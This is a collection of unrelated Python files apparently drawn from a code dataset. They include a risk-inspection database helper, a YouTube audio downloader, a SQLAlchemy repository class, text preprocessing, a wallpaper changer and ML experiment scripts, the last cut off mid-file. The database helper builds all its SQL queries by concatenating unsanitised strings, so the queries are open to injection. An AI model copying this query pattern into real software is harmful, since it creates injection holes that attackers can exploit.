row;\n\n def GET_RELEASE_PHASE(self, fluid):\n data = \"Liquid\";\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `Ambient` FROM `TBL_52_CA_PROPERTIES_LEVEL_1` WHERE `Fluid` = '\" + fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r[0];\n except pymysql.InternalError as Error:\n print(\"Error! get Release Phase from table 5.2\");\n return data;\n\n def GET_TBL_58(self, fluid):\n data = np.zeros(16);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT * FROM `TBL_58_CA_COMPONENT_DM` WHERE `Fluid` = '\" + fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n data[4] = r[5];\n data[5] = r[6];\n data[6] = r[7];\n data[7] = r[8];\n data[8] = r[9];\n data[9] = r[10];\n data[10] = r[11];\n data[11] = r[12];\n data[12] = r[13];\n data[13] = r[14];\n data[14] = r[15];\n data[15] = r[16];\n except pymysql.InternalError as Error:\n print(\"Error! execute data from table 5.8 error!\");\n return data;\n\n def GET_TBL_59(self, fluid):\n Cursor = conn.cursor();\n data = np.zeros(16);\n try:\n sql = \"SELECT * FROM `TBL_59_COMPONENT_DAMAGE_PERSON` WHERE `Fluid` = '\" + fluid + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n data[4] = r[5];\n data[5] = r[6];\n data[6] = r[7];\n data[7] = r[8];\n data[8] = r[9];\n data[9] = r[10];\n data[10] = r[11];\n data[11] = r[12];\n data[12] = r[13];\n data[13] = r[14];\n data[14] = r[15];\n data[15] = r[16];\n except pymysql.InternalError as Error:\n print(\"Error! Execute data Table 5.9 Fail\");\n return data;\n\n def GET_TBL_213(self, thickness):\n Cursor = conn.cursor();\n data = np.zeros(4);\n try:\n sql = \"SELECT * FROM `TBL_213_DM_IMPACT_EXEMPTION` WHERE `ComponentThickness` = '\" + str(thickness) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n except pymysql.InternalError as Error:\n print(\"Error! Execute data from Table 213 Fail\");\n return data;\n\n def GET_TBL_204(self, susceptibility):\n Cursor = conn.cursor();\n data = np.zeros(7);\n try:\n sql = \"SELECT * FROM `TBL_204_DM_HTHA` WHERE `Susceptibility` = '\"+susceptibility+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[1];\n data[1] = r[2];\n data[2] = r[3];\n data[3] = r[4];\n data[4] = r[5];\n data[5] = r[6];\n data[6] = r[7];\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 204 Fail\");\n return data;\n\n def GET_TBL_214(self, DeltaT, size):\n Cursor = conn.cursor();\n data = 0.0;\n try:\n sql = \"SELECT `\"+str(size)+\"` FROM djangorbi.tbl_214_dm_not_pwht WHERE `Tmin-Tref` = '\"+str(DeltaT)+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 214 Fail\");\n return data;\n\n def GET_TBL_215(self, DeltaT, size):\n Cursor = conn.cursor();\n data = 0;\n try:\n sql = \"SELECT `\" + str(size) + \"` FROM `TBL_215_DM_PWHT` WHERE `Tmin-Tref` = '\" + str(DeltaT) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 215 fail\");\n return data;\n\n def GET_TBL_511(self, ART, INSP, Effective):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"\";\n if(Effective == \"E\"):\n sql = \"SELECT `E` FROM `TBL_511_DFB_THIN` WHERE `art` ='\" + str(ART) + \"'\";\n else:\n sql = \"SELECT `\" + Effective + \"` FROM `TBL_511_DFB_THIN` WHERE `art` ='\" + str(ART) + \"' AND `insp` = '\" + str(INSP) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 511 Fail\");\n return data;\n\n def GET_TBL_512(self, ART, Effective):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\"+Effective+\"` FROM `TBL_512_DFB_THIN_TANK_BOTTOM` WHERE `art` = '\"+str(ART)+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 512 fail!\");\n return data;\n\n def GET_TBL_64(self, YEAR, Suscep):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\" + Suscep + \"` FROM `TBL_64_DM_LINNING_INORGANIC` WHERE `YearsSinceLastInspection` = '\" + str(YEAR) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 64 fail!\");\n return data;\n\n def GET_TBL_65(self, YEAR, Suscep):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\" + Suscep + \"` FROM `TBL_65_DM_LINNING_ORGANIC` WHERE `YearInService` = '\" + str(YEAR) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 65 fail\");\n return data;\n\n def GET_TBL_74(self, SVI, field):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `\" + field + \"` FROM `TBL_74_SCC_DM_PWHT` WHERE `SVI` ='\" + str(SVI) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 74 fail\");\n return data;\n\n def GET_TBL_3B21(self, locat):\n data = 0;\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `SIUnits` FROM `TBL_3B21_SI_CONVERSION` WHERE `conversionFactory` = '\" + str(locat) + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data = r;\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 3B21 fail\");\n return data;\n\n def GET_TBL_71_PROPERTIES(self, FluidTank):\n data = np.zeros(3);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT `Molecular Weight`,`Liquid Density`,`Liquid Density Viscosity` FROM `TBL_71_PROPERTIES_STORAGE_TANK` WHERE `Fluid`='\" + FluidTank + \"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[0];\n data[1] = r[1];\n data[2] = r[2];\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql from table 71 fail\");\n return data;\n\n def GET_API_COM(self, APIComponentTypeName):\n data = np.zeros(13);\n Cursor = conn.cursor();\n try:\n sql = \"SELECT * FROM `api_component_type` WHERE `APIComponentTypeName` = '\"+APIComponentTypeName+\"'\";\n Cursor.execute(sql);\n for r in Cursor:\n data[0] = r[2];\n data[1] = r[3];\n data[2] = r[4];\n data[3] = r[5];\n data[4] = r[6];\n data[5] = r[7];\n data[6] = r[8];\n data[7] = r[9];\n data[8] = r[10];\n data[9] = r[11];\n data[10] = r[12];\n data[11] = r[13];\n data[12] = r[14];\n except pymysql.InternalError as Error:\n print(\"Error! Execute sql table API_COMPONENT_TYPE fail\");\n return data;\n\n\n\n\n","repo_name":"Lab411bkhn/rbi","sub_path":"DjangoRBI/ProcessPython/MYSQL_CAL.py","file_name":"MYSQL_CAL.py","file_ext":"py","file_size_in_byte":9569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19645397302","text":"from pytube import YouTube\nimport ffmpeg\n\ndef save_audio(search_list):\n print(\"音声保存\")\n for ID in search_list:\n query = 'https://www.youtube.com/watch?v=' + ID\n print(query+\"を保存\")\n yt = YouTube(query)\n stream = yt.streams.get_audio_only()\n stream.download(\"./videos\")\n file_name = stream.default_filename\n print(file_name)\n\n # 音声取り出し→mp3化\n stream = ffmpeg.input(\"./videos/\" + file_name)\n audio_stream = stream.audio\n output_name = \"./audios/\" + file_name.replace(\".mp4\",\"\") + \".mp3\"\n print(\"out/\" + output_name)\n\n stream = ffmpeg.output(audio_stream, output_name)\n ffmpeg.run(stream)","repo_name":"tetsujp84/youtube_audio_downloader","sub_path":"donwload_audio.py","file_name":"donwload_audio.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42437339686","text":"from typing import List, Tuple, Type\n\nfrom sqlalchemy.orm import aliased\n\nfrom infra.entities.course import Course\nfrom infra.entities.registration import Registration\nfrom infra.entities.student import Student\n\nregistration_alias = aliased(Registration)\n\n\nclass RegistrationRepositoy:\n def __init__(self, ConnectionHandler) -> None:\n self.__ConnectionHandler = ConnectionHandler\n\n def __search_student_course(\n self, id_student: int, id_course: int\n ) -> Tuple[str, str]:\n \"\"\"Private method to search for the student's name and course, using parameters.\"\"\"\n\n with self.__ConnectionHandler() as db:\n try:\n data = (\n db.session.query(Registration)\n .filter(Registration.id_course == id_course)\n .where(Registration.id_student == id_student)\n .one()\n )\n data = (data.student.name, data.course.name)\n return data\n except Exception as exception:\n raise exception\n\n def select_all(self) -> List[Tuple[int, str, str]]:\n \"\"\"Searching all registrations\"\"\"\n\n with self.__ConnectionHandler() as db:\n try:\n data = (\n db.session.query(Registration)\n .join(Student, Registration.id_student == Student.id_student)\n .join(Course, Registration.id_course == Course.id_course)\n .with_entities(Registration.id_student, Student.name, Course.name)\n .all()\n )\n return data\n except Exception as exception:\n raise exception\n\n def searching_course(self, id_student: int) -> List[Tuple[str, int]]:\n \"\"\"Searches all courses in which the student is enrolled\"\"\"\n\n with self.__ConnectionHandler() as db:\n try:\n data = (\n db.session.query(Course)\n .join(\n registration_alias,\n Course.id_course == registration_alias.id_course,\n )\n .filter(registration_alias.id_student == id_student)\n .with_entities(Course.name, Course.id_course)\n .all()\n )\n return data\n except Exception as exception:\n raise exception\n\n def insert(self, id_student: int, id_course: int) -> str:\n \"\"\"Inserting a new registration.\"\"\"\n\n with self.__ConnectionHandler() as db:\n try:\n data = Registration(id_student=id_student, id_course=id_course)\n db.session.add(data)\n db.session.commit()\n student, course = self.__search_student_course(id_student, id_course)\n message = f\"Student registration: {student} in course: {course} completed successfull.\"\n return message\n except Exception as exception:\n db.session.rollback()\n raise exception\n\n def update(self, id_student: int, id_course: int) -> str:\n \"\"\"Updating the id_course field in the registrations table.\"\"\"\n\n with self.__ConnectionHandler() as db:\n db.session.query(Registration).filter(\n Registration.id_student == id_student\n ).update({\"id_course\": id_course})\n db.session.commit()\n return \"Update was successful\"\n\n def delete(self, id_student: int) -> str:\n \"\"\"Deleting a registration.\"\"\"\n\n with self.__ConnectionHandler() as db:\n db.session.query(Registration).filter(\n Registration.id_student == id_student\n ).delete()\n db.session.commit()\n return \"Deletion was successful\"\n","repo_name":"AlekysCoelho/SQLALCHEMY_Alembic","sub_path":"infra/repositories/registration_repositories.py","file_name":"registration_repositories.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3525244218","text":"import nltk\n\nimport re\nimport string\n\n\n# Prepare common variables\n\nstopwords = nltk.corpus.stopwords.words('english')\nstopwords_set = set(stopwords)\n\ncontraction_trans_dict = {\n \"'m\": \" am\",\n \"'re\": \" are\",\n \"'s\": \" is\",\n \"'ve\": \" have\",\n \"'ll\": \" will\",\n \"'d\": \" had\",\n \"n't\": \" not\"\n}\n\npunctuation_trans_dict = {}\npunctuation_trans_dict.update({c: None for c in string.punctuation})\npunctuation_trans_table = str.maketrans(punctuation_trans_dict)\n\n\ndef preprocess_sentence(s_str):\n \"\"\"\n Preprocesses a sentence. Preprocessing operations:\n - Conversion to lowercase.\n - Removing contractions.\n - Removing punctuation marks.\n\n :param s_str: str\n The sentence to preprocess.\n\n :return: str\n The preprocessed sentence.\n \"\"\"\n\n s_str = re.sub(r'\\d+', '', s_str)\n prep_s_str = s_str.lower()\n for key, value in contraction_trans_dict.items():\n prep_s_str = re.sub(key, value, prep_s_str)\n prep_s_str = prep_s_str.translate(punctuation_trans_table)\n return prep_s_str\n\n\ndef tokenize(s_str):\n \"\"\"\n Tokenizes a sentence.\n\n :param s_str:\n The sentence to tokenize.\n :return: list of str\n A list with the sentence tokens.\n \"\"\"\n return nltk.word_tokenize(s_str)\n\n\ndef remove_stopwords(s_tkns):\n \"\"\"\n Removes stopwords from a list of sentence tokens.\n\n :param s_tkns: list of str\n Sentence tokens.\n :return: list of str\n Sentence tokens without stopword tokens.\n \"\"\"\n return [word for word in s_tkns if word not in stopwords]\n","repo_name":"RedReservoir/STS-project","sub_path":"ihlt_sts/transform/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36475366344","text":"\"\"\"\nNuma eleição existem três candidatos. Faça um programa que peça o número total de eleitores.\nPeça para cada eleitor votar e ao final mostrar o número de votos de cada candidato.\n\"\"\"\ncandidato1 = 0\ncandidato2 = 0\ncandidato3 = 0\n\nprint('ELEIÇÃO!\\n'\n '[1] Bolsonaro\\n'\n '[2] Haddad\\n'\n '[3] Ciro')\ntotaleleitores = int(input('Qual é o números total de eleitores? '))\nfor i in range(totaleleitores):\n voto = int(input('Em quem você vota? [1] [2] [3] '))\n if voto > 3 or voto < 1:\n print('Votou errado! Vote novamente!')\n voto = int(input('Em quem você vota? [1] [2] [3] '))\n if voto == 1:\n candidato1 += 1\n elif voto == 2:\n candidato2 += 1\n elif voto == 3:\n candidato3 += 1\nprint('\\nRESULTADO DA ELEIÇÃO!')\nprint(f'Bolsonaro conseguiu {candidato1} votos.')\nprint(f'Haddad conseguiu {candidato2} votos.')\nprint(f'Ciro conseguiu {candidato3} votos.')\n","repo_name":"fredy-prudente/python-brasil-exercicios","sub_path":"Estrutura de Repetição/ex26.py","file_name":"ex26.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7705673781","text":"### a code to alwys redirect files to the folder containning the same file format\n\nimport os\n\n#source and distination directory\n\nsorc='/home/abdo_khattab/listen/'\ndist1='/home/abdo_khattab/mp3/'\ndist2='/home/abdo_khattab/pic/'\ndist3='/home/abdo_khattab/vid/'\n\n\n## infinite loop to always redirect file \n\n\nwhile True:\n\n for file in os.listdir(sorc): ## looping throut the source directory\n \n ## check dif formats types and assigning the new path\n \n if file.endswith('.mp3'): \n os.rename(sorc+file,dist1+file)\n elif file.endswith('.jpg'):\n os.rename(sorc+file,dist2+file) \n elif file.endswith('.mp4') :\n os.rename(sorc+file,dist3+file)\n","repo_name":"abood-eg/os_techniques","sub_path":"file_path_changing.py","file_name":"file_path_changing.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14924592569","text":"import os\r\nimport ctypes\r\nimport time\r\nimport random\r\nfrom threading import *\r\n# import sys\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter import *\r\nimport tkinter.font as font\r\n\r\n\r\n# sys.setrecursionlimit(1000)\r\nmainDizin=\"\"\r\n\r\nclass iplik:\r\n def __init__(self,target):\r\n self.target=target\r\n\r\n def run(self):\r\n thread=Thread(target=self.target) #Tkinter ile oluşturduğum \r\n thread.daemon = True #arayüzün donmasını engellemek\r\n thread.start() # için thread işlemini kullanıyorum\r\n \r\n\r\n\r\n\r\ndef main(dizin,adet,saniye):\r\n for i in range(adet):\r\n dosyaBul(dizin,dizin)\r\n time.sleep(saniye)\r\n \r\n \r\n\r\ndef dosyaBul(dizin,mainDizin):\r\n try:\r\n dosya=dosyaSec(dizin)\r\n if dosyaTuru(dosya)==1:\r\n resim=os.getcwd()+\"\\\\\"+dosya\r\n walpaper(resim)\r\n return resim\r\n \r\n if dosyaTuru(dosya)==2:\r\n liste=os.listdir() \r\n kontrol=[]\r\n for i in liste:\r\n i=i.split('.')\r\n if len(i)==1:\r\n pass\r\n else:\r\n kontrol.append(i[-1])\r\n if \"jpg\" in kontrol:\r\n return dosyaBul(dizin,mainDizin)\r\n else:\r\n return dosyaBul(mainDizin,mainDizin)\r\n except:\r\n return dosyaBul(dizin,mainDizin)\r\n \r\n if dosyaTuru(dosya)==3:\r\n return dosyaBul(os.getcwd()+\"\\\\\"+dosya,mainDizin)\r\n\r\ndef dosyaSec(dizin):\r\n bul=dizin\r\n os.chdir(bul)\r\n mainFolder=os.listdir()\r\n if mainFolder==[]:\r\n print(\"boşşşşşşşşşş\")\r\n return dosyaSec(ustDizin())\r\n \r\n \r\n else:\r\n rnd=random.randint(0,len(mainFolder)-1) \r\n subFolder=mainFolder[rnd] \r\n return subFolder\r\n \r\n\r\ndef dosyaTuru(dosya):\r\n try:\r\n kontrol=dosya.split(\".\")\r\n except:\r\n pass\r\n else:\r\n if len(kontrol)==1:\r\n return 3\r\n else:\r\n if kontrol[-1]==\"jpg\" or \"gif\" or \"png\": #DEŞĞİTİRİLECEK\r\n return 1\r\n else:\r\n return 2\r\n \r\ndef walpaper(dizin):\r\n ctypes.windll.user32.SystemParametersInfoW(20, 0, dizin, 3)\r\n\r\ndef ustDizin(): \r\n while True:\r\n kontrol=os.listdir()\r\n if len(kontrol)==1 or len(kontrol)==0:\r\n os.chdir('..')\r\n else:\r\n break\r\n return os.getcwd()\r\n\r\n\r\n \r\ndef tkPencere(mainDizin):\r\n pencere = tk.Tk() # pointing root to Tk() to use it as Tk() in program.\r\n # pencere.attributes('-topmost', True) # Opened windows will be active. above all windows despite of selection.\r\n \r\n pencere.geometry(\"500x300\")\r\n pencere.title(\"Wallpaper Değiştirme\")\r\n \r\n myFont = font.Font(size=40)\r\n \r\n tk.Label(text=\"Adet: \",font=myFont).grid(column=1,row=1)\r\n tk.Label(text=\"Saniye: \",font=myFont).grid(column=1,row=2)\r\n adet=tk.Entry(pencere,font=myFont,width=5)\r\n saniye=tk.Entry(pencere,font=myFont,width=5)\r\n adet.insert(index=10,string='10')\r\n saniye.insert(index=10,string='0.1')\r\n adet.grid(column=2,row=1)\r\n saniye.grid(column=2,row=2)\r\n class program():\r\n def __init__(self):\r\n self.mainDizin=mainDizin \r\n def yol(self):\r\n self.mainDizin = filedialog.askdirectory() # Returns opened path as str\r\n def calistir(self):\r\n if(self.mainDizin!=\"\"):\r\n ic_iplik=iplik(main(dizin=self.mainDizin,adet=int(adet.get()),saniye=float(saniye.get())))\r\n ic_iplik.run() \r\n \r\n else:\r\n tk.messagebox.showerror(\"Hata\",\"Dosya Seçilmedi\")\r\n a=program()\r\n \r\n button=tk.Button(pencere,text=\"Dosya Seç\",command=a.yol,font=myFont,fg=\"Red\")\r\n button.grid(column=1,row=3) \r\n button2=tk.Button(pencere,text=\"Başat\",command=a.calistir,font=myFont,fg=\"Red\")\r\n button2.grid(column=2,row=3)\r\n \r\n pencere.mainloop()\r\n \r\ndis_iplik=iplik(tkPencere(mainDizin))\r\ndis_iplik.run()\r\n\r\n\r\n","repo_name":"vehbix/wallpaper","sub_path":"Wallpaper.py","file_name":"Wallpaper.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18229575077","text":"from analysis.models import Corpus, MethodCategory\nfrom django.core.management.base import BaseCommand, CommandError\n\n\nclass Command(BaseCommand):\n help = 'Load the latest method definitions.'\n\n def handle(self, *args, **options) -> None:\n print('Attempting to set default methods')\n try:\n for category in MethodCategory.objects.all():\n print(f'Setting new defaults for category {category.name}')\n self.handle_category(category)\n except Exception as e:\n raise CommandError(e)\n finally:\n print('Setting new default methods complete')\n\n def handle_category(self, category: MethodCategory):\n new_method = category.definitions.latest()\n corpora = Corpus.objects.filter(method_category=category).exclude(default_method=new_method)\n print(f'Found {len(corpora)} corpora with older methods.')\n for corpus in corpora:\n old_method = corpus.default_method\n corpus.default_method = new_method\n corpus.save()\n print(f'Updated corpus {corpus.name} from {old_method.name if old_method else \"None\"} to {new_method.name}')\n","repo_name":"UUDigitalHumanitieslab/sasta","sub_path":"backend/analysis/management/commands/set_default_methods.py","file_name":"set_default_methods.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74074762154","text":"import os\nimport json\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom .suite import Suite\nfrom typing import Dict, Union\nfrom .rule_reusage_experiment import RuleReusageExperiment\n\n\nclass RuleReusageSuite(Suite):\n def __init__(self, dataset_name: str, error_generator: int = 0):\n super().__init__(\"GARF\", \"rule_coverage\", dataset_name, error_generator)\n\n def run(self,\n max_error_rate: float,\n min_error_rate: float = 0.1, \n error_step_size: float = 0.1, \n runs_per_error_rate: int = 5, \n error_intervals: int = 0, \n **kwargs):\n experiment = RuleReusageExperiment(np.inf, \"rule_coverage\", self.dataset)\n experiment.run()\n self.results = experiment.result()\n return self\n \n def merge(self, suite: Suite):\n self._check_results()\n suite._check_results()\n \n row_results, random_nan_results, col_results = self.results\n suite_row_results, suite_random_nan_results, suite_col_results = suite.results\n row_results = pd.concat([row_results, suite_row_results])\n random_nan_results = pd.concat([random_nan_results, suite_random_nan_results])\n col_results = pd.concat([col_results, suite_col_results])\n self.results = row_results, random_nan_results, col_results\n return self\n \n def save(self, arguments: Dict) -> pd.DataFrame:\n self._check_results()\n self._create_directory()\n \n row_results, random_nan_results, col_results = self.results\n row_results.to_csv(os.path.join(self.base_dir, \"row_results.csv\"))\n random_nan_results.to_csv(os.path.join(self.base_dir, \"random_nan_results.csv\"))\n col_results.to_csv(os.path.join(self.base_dir, \"col_results.csv\"))\n \n with open(os.path.join(self.base_dir, \"konfiguration.json\"), \"w\") as file:\n json.dump(arguments, file)\n return self.results \n \n def debug_plot(self, time: Union[str, int]):\n self.set_result_path(time)\n col_results = pd.read_csv(os.path.join(self.base_dir, \"col_results.csv\"), index_col=0)\n row_results = pd.read_csv(os.path.join(self.base_dir, \"row_results.csv\"), index_col=0)\n random_nan_results = pd.read_csv(os.path.join(self.base_dir, \"random_nan_results.csv\"), index_col=0)\n self.results = row_results, random_nan_results, col_results\n self.plot()\n \n @staticmethod\n def reverse_remove(df):\n max_value = df['remove'].max() + 1\n df['remove'] = abs(df['remove'] - max_value)\n return df\n \n def plot(self):\n self._check_results()\n self._create_directory()\n sns.color_palette(\"tab10\")\n row_results, random_nan_results, col_results = self.results\n \n max_row = pd.DataFrame({\n \"dataset\": row_results[\"dataset\"].unique(),\n \"remove\": [1.0] * len(row_results[\"dataset\"].unique()),\n \"coverage\": [0.0] * len(row_results[\"dataset\"].unique())\n })\n row_results = row_results.append(max_row)\n random_nan_results = random_nan_results.append(max_row)\n\n col_results = col_results.groupby([\"remove\", \"dataset\"])[\"coverage\"].mean().reset_index()\n col_results = col_results.groupby(\"dataset\").apply(self.reverse_remove)\n min_row = pd.DataFrame({\n \"dataset\": row_results[\"dataset\"].unique(),\n \"remove\": [0] * len(row_results[\"dataset\"].unique()),\n \"coverage\": [1.0] * len(row_results[\"dataset\"].unique())\n })\n col_results = col_results.append(min_row)\n col_results = col_results.rename(columns={\"coverage\": \"Rule Coverage\", \"remove\": \"Removed Columns\", \"dataset\": \"Dataset\"})\n sns.lineplot(\n data=col_results,\n x=\"Removed Columns\",\n y=\"Rule Coverage\",\n hue=\"Dataset\",\n marker=\"o\"\n )\n plt.ylim(0, 1.1)\n self._save_plot(os.path.join(self.base_dir, f\"rule_coverage_col_removal.png\"))\n \n row_result = row_results.groupby([\"remove\", \"dataset\"])[\"coverage\"].mean().reset_index()\n row_result = row_result.rename(columns={\"coverage\": \"Rule Coverage\", \"remove\": \"Removed Tuples (in \\%)\", \"dataset\": \"Dataset\"})\n sns.lineplot(\n data=row_result,\n x=\"Removed Tuples (in \\%)\",\n y=\"Rule Coverage\",\n hue=\"Dataset\",\n marker=\"o\"\n )\n plt.ylim(0, 1.1)\n self._save_plot(os.path.join(self.base_dir, f\"rule_coverage_tuple_removal.png\"))\n \n random_nan_results = random_nan_results.groupby([\"remove\", \"dataset\"])[\"coverage\"].mean().reset_index()\n random_nan_results = random_nan_results.rename(columns={\"coverage\": \"Rule Coverage\", \"remove\": \"nan-Cells (in \\%)\", \"dataset\": \"Dataset\"})\n sns.lineplot(\n data=random_nan_results,\n x=\"nan-Cells (in \\%)\",\n y=\"Rule Coverage\",\n hue=\"Dataset\",\n marker=\"o\"\n )\n plt.ylim(0, 1.1)\n self._save_plot(os.path.join(self.base_dir, f\"rule_coverage_cell_removal.png\"))","repo_name":"S-Eggers/MA-Cleaning-Data-Lakes-in-a-Self-Supervised-Manner","sub_path":"experiments/rule_reusage_suite.py","file_name":"rule_reusage_suite.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25125035000","text":"from timeit import default_timer as timer\nimport pandas as pd\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV, train_test_split, PredefinedSplit\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import mean_absolute_error, mean_absolute_percentage_error\nfrom dask_ml.wrappers import ParallelPostFit\n\n\nnp.random.seed(100465934)\ntrain = pd.read_pickle('trainst1ns16.pkl')\ntest = pd.read_pickle('testst1ns16.pkl')\ntrain_close, test_close = train.iloc[:,0:75], test.iloc[:,0:75]\n\n##### split 10 years train and 2 year val ########\nx_train, x_val, y_train, y_val = train_test_split(train_close.values,pd.Series(train['energy']),train_size=365*10)\n\n##### train models ############\nscalar = StandardScaler().fit(x_val)\nx_val_st = scalar.transform(x_val)\n\n# Predefined Val Split\nvalidation_indices = np.zeros(y_train.shape[0])\nvalidation_indices[:round(3/4*y_train.shape[0])] = -1\nvalidation_split = PredefinedSplit(validation_indices)\n\n#### Defaulted Models\n# knn\nscalar = StandardScaler()\nknn = KNeighborsRegressor()\nknnPipiLineDef = Pipeline([\n ('standartization',scalar),\n ('model', knn)\n ])\nknnPipiLineDef.fit(x_train,y_train)\n\n\n# Deision tree\nscalar = StandardScaler()\ndt = DecisionTreeRegressor()\ndtPipiLineDef = Pipeline([\n ('standartization',scalar),\n ('model', dt)\n ])\ndtPipiLineDef.fit(x_train,y_train)\n\n# svm\nscalar = StandardScaler()\nsvr = SVR()\nsvrPipiLineDef = Pipeline([\n ('standartization',scalar),\n ('model', svr)\n ])\nsvrPipiLineDef.fit(x_train,y_train)\n\n########################################## DASK ######################################\n#### Non Defaulted Defaulted Models\n# knn (Evri, using dask we were able to run the model in 20-40 % less, check ParallelPostFit)\n# knn\nprint('\\nKNN\\n')\nscalar = StandardScaler()\nknn = ParallelPostFit(KNeighborsRegressor())\nknnPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', knn)\n ])\ngdSearchKnn = GridSearchCV(knnPipiLine\n , {'model__estimator__n_neighbors':[1,2,3,4,5,6,7,8]}\n , cv = validation_split\n , refit=False\n , error_score='raise'\n , scoring='neg_mean_absolute_error')\n\nstart = timer()\ngdSearchKnn.fit(x_train,y_train)\ntrain_patched = timer() - start\nprint(f\"time for KNN: {train_patched:.2f} s\")\nprint('KNN best hyperparameters: ', gdSearchKnn.best_params_)\n\nprint('\\nDT\\n')\n# Deision tree\ndt = ParallelPostFit(DecisionTreeRegressor())\ndtPipiLine = Pipeline([\n ('model', dt)\n ])\ngdSearchDt = RandomizedSearchCV(dtPipiLine\n , {'model__estimator__max_depth':[2, 5, 10, 30, 75, 100]\n , 'model__estimator__min_samples_split': [2, 5, 10, 20, 50]\n , 'model__estimator__max_features': ['auto','sqrt']\n , 'model__estimator__min_samples_leaf': [2,4,10]\n }\n , cv = validation_split\n , refit=False\n , scoring='neg_mean_absolute_error'\n )\n\nstart = timer()\ngdSearchDt.fit(x_train,y_train)\ntrain_patched = timer() - start\nprint(f\"time for DT: {train_patched:.2f} s\")\nprint('DT best hyperparameters: ', gdSearchDt.best_params_)\n\nprint('\\nSVM\\n')\n# svm\nscalar = StandardScaler()\nsvr = ParallelPostFit(SVR())\nsvrPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', svr)\n ])\ngdSearchSvr = RandomizedSearchCV(svrPipiLine\n , {'model__estimator__C':[1,2,3,4]\n ,'model__estimator__kernel': ['linear', 'poly', 'rbf', 'sigmoid', 'precomputed']\n }\n , cv = validation_split\n , refit=False\n , scoring='neg_mean_absolute_error'\n )\n\nstart = timer()\ngdSearchSvr.fit(x_train,y_train)\ntrain_patched = timer() - start\nprint(f\"time for SVR: {train_patched:.2f} s\")\nprint('SVR best hyperparameters: ', gdSearchSvr.best_params_)\n\n######### Re-fiting the models with the best params ##########\nknn = ParallelPostFit(KNeighborsRegressor(n_neighbors=gdSearchKnn.best_params_['model__estimator__n_neighbors']))\nknnPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', knn)\n ])\nknnPipiLine.fit(x_train,y_train)\n\nDT = ParallelPostFit(DecisionTreeRegressor(min_samples_split = gdSearchDt.best_params_['model__estimator__min_samples_split']\n , min_samples_leaf = gdSearchDt.best_params_['model__estimator__min_samples_leaf']\n , max_features= gdSearchDt.best_params_['model__estimator__max_features']\n , max_depth = gdSearchDt.best_params_['model__estimator__max_depth']))\nDtPipiLine = Pipeline([\n ('model', DT)\n 